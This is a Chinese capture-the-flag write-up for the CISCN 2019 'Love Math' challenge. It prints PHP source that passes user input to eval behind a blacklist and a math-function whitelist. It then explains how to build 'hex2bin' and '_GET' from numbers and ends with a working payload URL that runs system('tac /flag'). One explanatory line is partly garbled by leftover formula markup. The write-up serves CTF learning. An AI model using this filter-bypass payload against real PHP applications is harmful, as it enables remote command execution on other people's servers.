• [CISCN 2019 初赛]Love Math


    直接给了源码

    1. error_reporting(0);
    2. //听说你很喜欢数学,不知道你是否爱它胜过爱flag
    3. if(!isset($_GET['c'])){
    4. show_source(__FILE__);
    5. }else{
    6. //例子 c=20-1
    7. $content = $_GET['c'];
    8. if (strlen($content) >= 80) {
    9. die("太长了不会算");
    10. }
    11. $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    12. foreach ($blacklist as $blackitem) {
    13. if (preg_match('/' . $blackitem . '/m', $content)) {
    14. die("请不要输入奇奇怪怪的字符");
    15. }
    16. }
    17. //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
    18. $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    19. preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);
    20. foreach ($used_funcs[0] as $func) {
    21. if (!in_array($func, $whitelist)) {
    22. die("请不要输入奇奇怪怪的函数");
    23. }
    24. }
    25. //帮你算出答案
    26. eval('echo '.$content.';');
    27. }

    我们一部分一部分的来看

    1. if (strlen($content) >= 80) {
    2. die("太长了不会算");
    3. }

    对传入的字符串长度限制

    1. $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    2. foreach ($blacklist as $blackitem) {
    3. if (preg_match('/' . $blackitem . '/m', $content)) {
    4. die("请不要输入奇奇怪怪的字符");
    5. }
    6. }

    一个黑名单,进行过滤

    1. //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
    2. $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    3. preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);
    4. foreach ($used_funcs[0] as $func) {
    5. if (!in_array($func, $whitelist)) {
    6. die("请不要输入奇奇怪怪的函数");
    7. }
    8. }
    9. //帮你算出答案
    10. eval('echo '.$content.';');

    给出了可以用的一些“函数”

    然后是个eval,我们的目的就是绕过层层过滤,执行eval

    因为过滤了“[” “]”,在GET传参时就不能再传入GET参数,例如

    ?c=($_GET[a])($_GET[b])&a=system&b=cat /flag

    这里我们注意到两个函数 

    • base_convert() 函数:在任意进制之间转换数字
    • dechex() 函数:把十进制转换为十六进制

    我们利用 base_convert()函数来构造 hex2bin()函数,再结合 dechex()函数来得到 hex2bin需要执行的十六进制字符串,从而构造出 _GET

    base_convert(37907361743,10,36) => "hex2bin"
    dechex(1598506324) => "5f474554"
    $pi=hex2bin("5f474554") => $pi="_GET"   //hex2bin将一串16进制数转换为二进制字符串
    (

    pi)pi((" role="presentation" style="text-align: center; position: relative;">pi)pi((
    pi){abs}) => ($_GET){pi}($_GET){abs}  //{}可以代替[]

    payload

    ?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=tac /flag

     

  • 相关阅读:
    安卓系统框架和Framework概述
    JUC并发编程笔记2
    操作系统:服务接口
    kafka和ZK的关系
    this指哪去了
    Python中的一些有趣的内置函数
    大数据Flink(九十六):DML:Deduplication
    JS 流行框架(七):WOW
    重返ubuntu世界
    主机重启后k8s kubelet无法自动启动问题解决梳理
  • 原文地址:https://blog.csdn.net/Yb_140/article/details/127425981